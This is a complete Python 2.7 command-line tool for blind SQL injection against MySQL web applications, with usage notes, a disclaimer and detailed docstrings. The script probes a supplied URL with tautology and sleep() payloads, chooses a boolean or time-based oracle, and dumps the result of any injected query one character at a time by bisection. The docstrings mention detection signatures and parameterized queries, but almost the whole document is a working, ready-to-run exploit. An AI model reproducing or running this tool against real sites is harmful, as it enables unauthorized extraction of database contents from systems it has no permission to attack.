SQL injection/mysqli-blindutils/sqli-slee.py
Info
The syntax of this script is:
python bsqli.py -u [url] -i [injection]
Example
python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"
Disclaimer
The end-user is liable for his or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.
Source
#!/usr/bin/python2.7
"""Blind SQL injection character-extraction script for MySQL (Python 2.7).

Every query this script sends is a plain HTTP GET whose query string is the
caller-supplied URL with a fixed suffix appended: `AND 43 like 43--+` and
`AND 34 like 43--+` for the vulnerability probe, `and sleep(5)--+` for the
timing probe, and `and ascii(substr((...) from N for 1))<op><value>--+` for
each extracted character (see vuln_check(), is_what() and main()). From the
defender's side those literal fragments, and the burst of near-identical
requests that differ only in the trailing comparison, are what request logs,
WAF rules and query-log review key on; at the application layer the issue is
removed entirely by using parameterized queries instead of string-built SQL.

The three functions share two module globals set at runtime:
  sqli_type     -- 'boolean' or 'time', set by main() from vuln_check()
  TrueResponse  -- response length of the "true" probe, set by vuln_check()
"""
import sys,re,urllib,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError

def request(URL):
    """Fetch URL and return the length of the response body in bytes.

    The body length is the only thing the rest of the script looks at: the
    boolean oracle compares it against the length recorded for the "true"
    probe, and the time oracle ignores it and measures wall-clock time.
    A fixed desktop-browser User-Agent is sent on every request.

    On HTTPError or URLError the error is printed and the process exits
    with status 1 -- there is no retry or fallback.
    """
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
    req = urllib2.Request(URL, None, user_agent)
    try:
        # Local `request` shadows this function's own name; it only lives
        # for the duration of the call, so callers are unaffected.
        request = urllib2.urlopen(req)
    except HTTPError, e:
        print('[!] The server couldnt fulfill the request.')
        print('[!] Error code: ' + str(e.code))
        sys.exit(1)
    except URLError, e:
        print('[!] We failed to reach a server.')
        print('[!] Reason: ' + str(e.reason))
        sys.exit(1)
    return len(request.read())

def value(URL):
    """Recover one character's ASCII code by bisection over 0..255.

    URL is the injection URL up to and including the `ascii(substr(...))`
    expression; is_what() appends the comparison operator and the probe
    value. Each loop iteration asks the oracle up to three times
    ('>', '<', '='), so one character can cost up to 27 requests.

    Returns the character as a one-byte str when an '=' probe matches, or
    the sentinel string 'done' after 9 iterations without a match; main()
    treats 'done' as the end of the extracted value.
    """
    target = 0  # unused
    end = 0
    next_maybe = 0
    floor = 0
    ceiling = 255
    maybe = int(ceiling)/2
    # 9 iterations bounds the search; next_maybe is recomputed from the
    # half-width of the current window on each '>' / '<' answer.
    while(end != 9):
        if(is_what(URL, maybe, '>')):
            floor = maybe
            next_maybe = int(maybe + ((ceiling - floor)/2))
        elif(is_what(URL, maybe, '<')):
            ceiling = maybe
            next_maybe = int(maybe - ((ceiling - floor)/2))
        elif(is_what(URL, maybe, '=')):
            return chr(maybe)
        maybe = next_maybe
        end += 1
    return 'done'

def is_what(URL, maybe, op):
    """Ask the oracle whether `<expression> op maybe` holds; return 1 or 0.

    Reads the module globals sqli_type and TrueResponse.

    boolean mode: appends `op`, `maybe` and `--+` to URL and compares the
      response length with TrueResponse (equal length => 1).
    time mode:    appends `op`, `maybe` and `)*2)--+` -- closing the
      `sleep((select ascii(...)` opened in main() -- and returns 1 when the
      request took longer than 2 seconds.

    Returns None implicitly if sqli_type is neither value.
    """
    if(sqli_type == 'boolean'):
        ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
        if(TrueResponse == ValueResponse):
            return 1
        else:
            return 0
    elif(sqli_type == 'time'):
        start = time.time()
        # Result is deliberately ignored (note the misspelled local); only
        # the elapsed wall-clock time matters here.
        ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
        elapsed_time = (time.time() - start)
        if (elapsed_time > 2):
            return 1
        else:
            return 0

def vuln_check(URL):
    """Probe URL and return 'boolean' or 'time'; exit(1) if neither fires.

    Sends a true tautology (`AND 43 like 43`) and a false one
    (`AND 34 like 43`); differing response lengths select boolean mode
    and the true-probe length is stored in the global TrueResponse for
    is_what(). Otherwise a `sleep(5)` probe is sent and time mode is
    selected when the round trip exceeds 5 seconds. Network latency alone
    can push either measurement over its threshold, so a positive result
    here is a heuristic, not a confirmation.
    """
    print('[+] Checking site...')
    global TrueResponse
    TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
    FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
    if(TrueResponse != FalseResponse):
        print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
        return 'boolean'
    else:
        start = time.time()
        SleepResponse = request(URL + '%20and%20sleep(5)--+')  # length unused
        elapsed_time = (time.time() - start)
        if(elapsed_time > 5):
            print('[+] Site seems to be vulnerable to time based blind SQL injection.')
            return 'time'
        else:
            print('[!] Seems like site isnt vulnerable to blind SQL injection.')
            sys.exit(1)

def main():
    """Parse -u/-i, pick an oracle via vuln_check(), then extract characters.

    The -i expression is percent-encoded with urllib2.quote and embedded in
    `ascii(substr((<expr>) from <position> for 1))`; position starts at 1 and
    is advanced until value() returns 'done'. Both -u and -i are required;
    otherwise the usage hint is printed and the process exits with 1.
    """
    print(''' Auto BSQLi tool for MySQL ''')
    usage = 'usage: %prog -u <target> -i <injection>'
    parser = OptionParser(usage=usage)
    parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
    parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
    (options, args) = parser.parse_args()
    if(options.URL and options.INJECTION):
        URL = options.URL
        INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
    else:
        print('[!] Missing url or injection parameter.')
        print('[!] Use --help.')
        sys.exit(1)
    global sqli_type
    sqli_type = vuln_check(URL)
    position = 1
    dump = ''
    print('[+] Dumping data...')
    # One value() call per character; the loop only ends on the 'done'
    # sentinel, so there is no upper bound on the number of requests.
    while(1):
        if(sqli_type == 'boolean'):
            letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
        elif(sqli_type == 'time'):
            # Opens `sleep((select ascii(...)`; is_what() closes it with `)*2)`.
            letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
        if(letter == 'done'):
            break
        dump = dump + letter
        position += 1
    if(dump):
        print('[+] Data: ' + dump)
    else:
        print('[!] No data dumped. Check your injection.')

if __name__ == "__main__":
    main()